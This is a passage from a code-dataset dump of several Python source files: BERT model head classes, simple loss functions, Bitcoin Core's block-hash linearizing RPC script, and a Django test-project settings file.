scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `masked_lm_labels`: masked language modeling labels: torch.LongTensor of shape [batch_size, sequence_length]\n with indices selected in [-1, 0, ..., vocab_size]. 
All labels set to -1 are ignored (masked), the loss\n is only computed for the labels set in [0, ..., vocab_size]\n `next_sentence_label`: next sentence classification loss: torch.LongTensor of shape [batch_size]\n with indices selected in [0, 1].\n 0 => next sentence is the continuation, 1 => next sentence is a random sentence.\n\n Outputs:\n if `masked_lm_labels` and `next_sentence_label` are not `None`:\n Outputs the total_loss which is the sum of the masked language modeling loss and the next\n sentence classification loss.\n if `masked_lm_labels` or `next_sentence_label` is `None`:\n Outputs a tuple comprising\n - the masked language modeling logits of shape [batch_size, sequence_length, vocab_size], and\n - the next sentence classification logits of shape [batch_size, 2].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForPreTraining(config)\n masked_lm_logits_scores, seq_relationship_logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForPreTraining, self).__init__(config)\n self.bert = BertModel(config)\n self.cls = BertPreTrainingHeads(config, self.bert.embeddings.word_embeddings.weight)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None, next_sentence_label=None, checkpoint_activations=False):\n sequence_output, pooled_output = self.bert(input_ids, token_type_ids, attention_mask,\n output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n prediction_scores, seq_relationship_score = self.cls(sequence_output, pooled_output)\n\n\n if masked_lm_labels is not None and next_sentence_label is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-1)\n masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))\n next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))\n total_loss = masked_lm_loss + next_sentence_loss\n return total_loss\n else:\n return prediction_scores, seq_relationship_score\n\n\nclass BertForMaskedLM(PreTrainedBertModel):\n \"\"\"BERT model with the masked language modeling head.\n This module comprises the BERT model followed by the masked language modeling head.\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. 
It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `masked_lm_labels`: masked language modeling labels: torch.LongTensor of shape [batch_size, sequence_length]\n with indices selected in [-1, 0, ..., vocab_size]. All labels set to -1 are ignored (masked), the loss\n is only computed for the labels set in [0, ..., vocab_size]\n\n Outputs:\n if `masked_lm_labels` is not `None`:\n Outputs the masked language modeling loss.\n if `masked_lm_labels` is `None`:\n Outputs the masked language modeling logits of shape [batch_size, sequence_length, vocab_size].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForMaskedLM(config)\n masked_lm_logits_scores = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForMaskedLM, self).__init__(config)\n self.bert = BertModel(config)\n self.cls = BertOnlyMLMHead(config, self.bert.embeddings.word_embeddings.weight)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None, checkpoint_activations=False):\n sequence_output, _ = self.bert(input_ids, token_type_ids, attention_mask,\n output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n prediction_scores = self.cls(sequence_output)\n\n if masked_lm_labels is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-1)\n masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))\n return masked_lm_loss\n else:\n return prediction_scores\n\n\nclass BertForNextSentencePrediction(PreTrainedBertModel):\n \"\"\"BERT model with next sentence prediction head.\n This module comprises the BERT model followed by the next sentence classification head.\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. 
It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `next_sentence_label`: next sentence classification loss: torch.LongTensor of shape [batch_size]\n with indices selected in [0, 1].\n 0 => next sentence is the continuation, 1 => next sentence is a random sentence.\n\n Outputs:\n if `next_sentence_label` is not `None`:\n Outputs the total_loss which is the sum of the masked language modeling loss and the next\n sentence classification loss.\n if `next_sentence_label` is `None`:\n Outputs the next sentence classification logits of shape [batch_size, 2].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForNextSentencePrediction(config)\n seq_relationship_logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForNextSentencePrediction, self).__init__(config)\n self.bert = BertModel(config)\n self.cls = BertOnlyNSPHead(config)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, next_sentence_label=None, checkpoint_activations=False):\n _, pooled_output = self.bert(input_ids, token_type_ids, attention_mask,\n output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n seq_relationship_score = self.cls( pooled_output)\n\n if next_sentence_label is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-1)\n next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))\n return next_sentence_loss\n else:\n return seq_relationship_score\n\n\nclass BertForSequenceClassification(PreTrainedBertModel):\n \"\"\"BERT model for classification.\n This module is composed of the BERT model with a linear layer on top of\n the pooled output.\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n `num_labels`: the number of classes for the classifier. Default = 2.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. 
It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `labels`: labels for the classification output: torch.LongTensor of shape [batch_size]\n with indices selected in [0, ..., num_labels].\n\n Outputs:\n if `labels` is not `None`:\n Outputs the CrossEntropy classification loss of the output with the labels.\n if `labels` is `None`:\n Outputs the classification logits of shape [batch_size, num_labels].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n num_labels = 2\n\n model = BertForSequenceClassification(config, num_labels)\n logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config, num_labels=2):\n super(BertForSequenceClassification, self).__init__(config)\n self.num_labels = num_labels\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, num_labels)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, checkpoint_activations=False):\n _, pooled_output = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n return loss\n else:\n return logits\n\n\nclass BertForMultipleChoice(PreTrainedBertModel):\n \"\"\"BERT model for multiple choice tasks.\n This module is composed of the BERT model with a linear layer on top of\n the pooled output.\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n `num_choices`: the number of classes for the classifier. Default = 2.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, num_choices, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, num_choices, sequence_length]\n with the token types indices selected in [0, 1]. Type 0 corresponds to a `sentence A`\n and type 1 corresponds to a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, num_choices, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. 
It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `labels`: labels for the classification output: torch.LongTensor of shape [batch_size]\n with indices selected in [0, ..., num_choices].\n\n Outputs:\n if `labels` is not `None`:\n Outputs the CrossEntropy classification loss of the output with the labels.\n if `labels` is `None`:\n Outputs the classification logits of shape [batch_size, num_labels].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[[31, 51, 99], [15, 5, 0]], [[12, 16, 42], [14, 28, 57]]])\n input_mask = torch.LongTensor([[[1, 1, 1], [1, 1, 0]],[[1,1,0], [1, 0, 0]]])\n token_type_ids = torch.LongTensor([[[0, 0, 1], [0, 1, 0]],[[0, 1, 1], [0, 0, 1]]])\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n num_choices = 2\n\n model = BertForMultipleChoice(config, num_choices)\n logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config, num_choices=2):\n super(BertForMultipleChoice, self).__init__(config)\n self.num_choices = num_choices\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, 1)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, checkpoint_activations=False):\n flat_input_ids = input_ids.view(-1, input_ids.size(-1))\n flat_token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1))\n flat_attention_mask = attention_mask.view(-1, attention_mask.size(-1))\n _, pooled_output = self.bert(flat_input_ids, flat_token_type_ids, flat_attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n reshaped_logits = logits.view(-1, self.num_choices)\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(reshaped_logits, labels)\n return loss\n else:\n return reshaped_logits\n\n\nclass BertForTokenClassification(PreTrainedBertModel):\n \"\"\"BERT model for token-level classification.\n This module is composed of the BERT model with a linear layer on top of\n the full hidden state of the last layer.\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n `num_labels`: the number of classes for the classifier. Default = 2.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. 
It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `labels`: labels for the classification output: torch.LongTensor of shape [batch_size]\n with indices selected in [0, ..., num_labels].\n\n Outputs:\n if `labels` is not `None`:\n Outputs the CrossEntropy classification loss of the output with the labels.\n if `labels` is `None`:\n Outputs the classification logits of shape [batch_size, sequence_length, num_labels].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n num_labels = 2\n\n model = BertForTokenClassification(config, num_labels)\n logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config, num_labels=2):\n super(BertForTokenClassification, self).__init__(config)\n self.num_labels = num_labels\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, num_labels)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, checkpoint_activations=False):\n sequence_output, _ = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n return loss\n else:\n return logits\n\n\nclass BertForQuestionAnswering(PreTrainedBertModel):\n \"\"\"BERT model for Question Answering (span extraction).\n This module is composed of the BERT model with a linear layer on top of\n the sequence output that computes start_logits and end_logits\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. 
It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `start_positions`: position of the first token for the labeled span: torch.LongTensor of shape [batch_size].\n Positions are clamped to the length of the sequence and position outside of the sequence are not taken\n into account for computing the loss.\n `end_positions`: position of the last token for the labeled span: torch.LongTensor of shape [batch_size].\n Positions are clamped to the length of the sequence and position outside of the sequence are not taken\n into account for computing the loss.\n\n Outputs:\n if `start_positions` and `end_positions` are not `None`:\n Outputs the total_loss which is the sum of the CrossEntropy loss for the start and end token positions.\n if `start_positions` or `end_positions` is `None`:\n Outputs a tuple of start_logits, end_logits which are the logits respectively for the start and end\n position tokens of shape [batch_size, sequence_length].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForQuestionAnswering(config)\n start_logits, end_logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForQuestionAnswering, self).__init__(config)\n self.bert = BertModel(config)\n # TODO check with Google if it's normal there is no dropout on the token classifier of SQuAD in the TF version\n # self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.qa_outputs = nn.Linear(config.hidden_size, 2)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, start_positions=None, end_positions=None, checkpoint_activations=False):\n sequence_output, _ = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n logits = self.qa_outputs(sequence_output)\n start_logits, end_logits = logits.split(1, dim=-1)\n start_logits = start_logits.squeeze(-1)\n end_logits = end_logits.squeeze(-1)\n\n if start_positions is not None and end_positions is not None:\n # If we are on multi-GPU, split add a dimension\n if len(start_positions.size()) > 1:\n start_positions = start_positions.squeeze(-1)\n if len(end_positions.size()) > 1:\n end_positions = end_positions.squeeze(-1)\n # sometimes the start/end positions are outside our model inputs, we ignore these terms\n ignored_index = start_logits.size(1)\n start_positions.clamp_(0, ignored_index)\n end_positions.clamp_(0, ignored_index)\n\n loss_fct = CrossEntropyLoss(ignore_index=ignored_index)\n start_loss = loss_fct(start_logits, start_positions)\n end_loss = loss_fct(end_logits, end_positions)\n total_loss = (start_loss + end_loss) / 2\n return total_loss\n else:\n return start_logits, end_logits\n\n\n\n\n"} {"ext": "py", "sha": "1a2f53363c723cd3945e5c889bccc764eabdd84d", "content": "\"\"\"\nobjectives.py: Objective (or loss) functions. 
Each defines a loss and its derivative\n with respect to the network prediction.\nCopyright 2017 Ramon Vinas\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport math\n\n\nclass Objective:\n def __init__(self):\n raise NotImplementedError\n\n def get_loss(self, y_true, y_pred):\n raise NotImplementedError\n\n def derivative(self, y_true, y_pred):\n raise NotImplementedError\n\n\nclass CrossEntropy(Objective):\n def __init__(self):\n pass\n\n def get_loss(self, y_true, y_pred, eps=1e-6):\n return -y_true * math.log(y_pred + eps) - (1 - y_true) * math.log(1 - y_pred + eps)\n\n def derivative(self, y_true, y_pred):\n return (y_pred - y_true) / (y_pred * (1 - y_pred))\n\n\nclass SquaredError(Objective):\n def __init__(self):\n pass\n\n def get_loss(self, y_true, y_pred):\n return (y_true - y_pred) ** 2\n\n def derivative(self, y_true, y_pred):\n return 2 * (y_true - y_pred)\n"} {"ext": "py", "sha": "1a2f537443b67da5f567a524f1a86305586022a2", "content": "#!/usr/bin/env python3\n#\n# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.\n#\n# Copyright (c) 2013-2014 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n#\n\nfrom __future__ import print_function\ntry: # Python 3\n import http.client as httplib\nexcept ImportError: # Python 2\n import httplib\nimport json\nimport re\nimport base64\nimport sys\nimport os\nimport os.path\n\nsettings = {}\n\n##### Switch endian-ness #####\ndef hex_switchEndian(s):\n\t\"\"\" Switches the endianness of a hex string (in pairs of hex chars) \"\"\"\n\tpairList = [s[i:i+2].encode() for i in range(0, len(s), 2)]\n\treturn b''.join(pairList[::-1]).decode()\n\nclass BitcoinRPC:\n\tdef __init__(self, host, port, username, password):\n\t\tauthpair = \"%s:%s\" % (username, password)\n\t\tauthpair = authpair.encode('utf-8')\n\t\tself.authhdr = b\"Basic \" + base64.b64encode(authpair)\n\t\tself.conn = httplib.HTTPConnection(host, port=port, timeout=30)\n\n\tdef execute(self, obj):\n\t\ttry:\n\t\t\tself.conn.request('POST', '/', json.dumps(obj),\n\t\t\t\t{ 'Authorization' : self.authhdr,\n\t\t\t\t 'Content-type' : 'application/json' })\n\t\texcept ConnectionRefusedError:\n\t\t\tprint('RPC connection refused. 
Check RPC settings and the server status.',\n\t\t\t file=sys.stderr)\n\t\t\treturn None\n\n\t\tresp = self.conn.getresponse()\n\t\tif resp is None:\n\t\t\tprint(\"JSON-RPC: no response\", file=sys.stderr)\n\t\t\treturn None\n\n\t\tbody = resp.read().decode('utf-8')\n\t\tresp_obj = json.loads(body)\n\t\treturn resp_obj\n\n\t@staticmethod\n\tdef build_request(idx, method, params):\n\t\tobj = { 'version' : '1.1',\n\t\t\t'method' : method,\n\t\t\t'id' : idx }\n\t\tif params is None:\n\t\t\tobj['params'] = []\n\t\telse:\n\t\t\tobj['params'] = params\n\t\treturn obj\n\n\t@staticmethod\n\tdef response_is_error(resp_obj):\n\t\treturn 'error' in resp_obj and resp_obj['error'] is not None\n\ndef get_block_hashes(settings, max_blocks_per_call=10000):\n\trpc = BitcoinRPC(settings['host'], settings['port'],\n\t\t\t settings['rpcuser'], settings['rpcpassword'])\n\n\theight = settings['min_height']\n\twhile height < settings['max_height']+1:\n\t\tnum_blocks = min(settings['max_height']+1-height, max_blocks_per_call)\n\t\tbatch = []\n\t\tfor x in range(num_blocks):\n\t\t\tbatch.append(rpc.build_request(x, 'getblockhash', [height + x]))\n\n\t\treply = rpc.execute(batch)\n\t\tif reply is None:\n\t\t\tprint('Cannot continue. Program will halt.')\n\t\t\treturn None\n\n\t\tfor x,resp_obj in enumerate(reply):\n\t\t\tif rpc.response_is_error(resp_obj):\n\t\t\t\tprint('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)\n\t\t\t\texit(1)\n\t\t\tassert(resp_obj['id'] == x) # assume replies are in-sequence\n\t\t\tif settings['rev_hash_bytes'] == 'true':\n\t\t\t\tresp_obj['result'] = hex_switchEndian(resp_obj['result'])\n\t\t\tprint(resp_obj['result'])\n\n\t\theight += num_blocks\n\ndef get_rpc_cookie():\n\t# Open the cookie file\n\twith open(os.path.join(os.path.expanduser(settings['datadir']), '.cookie'), 'r') as f:\n\t\tcombined = f.readline()\n\t\tcombined_split = combined.split(\":\")\n\t\tsettings['rpcuser'] = combined_split[0]\n\t\tsettings['rpcpassword'] = combined_split[1]\n\nif __name__ == '__main__':\n\tif len(sys.argv) != 2:\n\t\tprint(\"Usage: linearize-hashes.py CONFIG-FILE\")\n\t\tsys.exit(1)\n\n\tf = open(sys.argv[1])\n\tfor line in f:\n\t\t# skip comment lines\n\t\tm = re.search('^\\s*#', line)\n\t\tif m:\n\t\t\tcontinue\n\n\t\t# parse key=value lines\n\t\tm = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n\t\tif m is None:\n\t\t\tcontinue\n\t\tsettings[m.group(1)] = m.group(2)\n\tf.close()\n\n\tif 'host' not in settings:\n\t\tsettings['host'] = '127.0.0.1'\n\tif 'port' not in settings:\n\t\tsettings['port'] = 9998\n\tif 'min_height' not in settings:\n\t\tsettings['min_height'] = 0\n\tif 'max_height' not in settings:\n\t\tsettings['max_height'] = 313000\n\tif 'rev_hash_bytes' not in settings:\n\t\tsettings['rev_hash_bytes'] = 'false'\n\n\tuse_userpass = True\n\tuse_datadir = False\n\tif 'rpcuser' not in settings or 'rpcpassword' not in settings:\n\t\tuse_userpass = False\n\tif 'datadir' in settings and not use_userpass:\n\t\tuse_datadir = True\n\tif not use_userpass and not use_datadir:\n\t\tprint(\"Missing datadir or username and/or password in cfg file\", file=sys.stderr)\n\t\tsys.exit(1)\n\n\tsettings['port'] = int(settings['port'])\n\tsettings['min_height'] = int(settings['min_height'])\n\tsettings['max_height'] = int(settings['max_height'])\n\n\t# Force hash byte format setting to be lowercase to make comparisons easier.\n\tsettings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()\n\n\t# Get the rpc user and pass from the cookie if the datadir is set\n\tif 
use_datadir:\n\t\tget_rpc_cookie()\n\n\tget_block_hashes(settings)\n"} {"ext": "py", "sha": "1a2f5695c7fdc5d6cc79a8dfa8b419505f24e4d5", "content": "\"\"\"\nDjango settings for tests project.\n\nGenerated by 'django-admin startproject' using Django 1.9.1.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.9/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.9/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '5bg%^f37a=%mh8(qkq1#)a$e*d-pt*dzox0_39-ywqh=@m(_ii'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = [u'testserver']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'tests',\n]\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'project.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'project.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'tests', 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n\nLANGUAGE_CODE = 'en'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = False\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.9/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n\n# Caching\n\nCACHE_DIR = os.path.join(BASE_DIR, '.cache')\n\nCACHES = {\n 'default': {\n 'BACKEND': 'diskcache.DjangoCache',\n 'LOCATION': CACHE_DIR,\n },\n}\n"} {"ext": "py", "sha": "1a2f56ae602d3bfd4f34db75bcdb1e42f9cd14d0", "content": "#!/usr/bin/env python\n\n\"\"\"\nEasy Install\n------------\n\nA tool for 
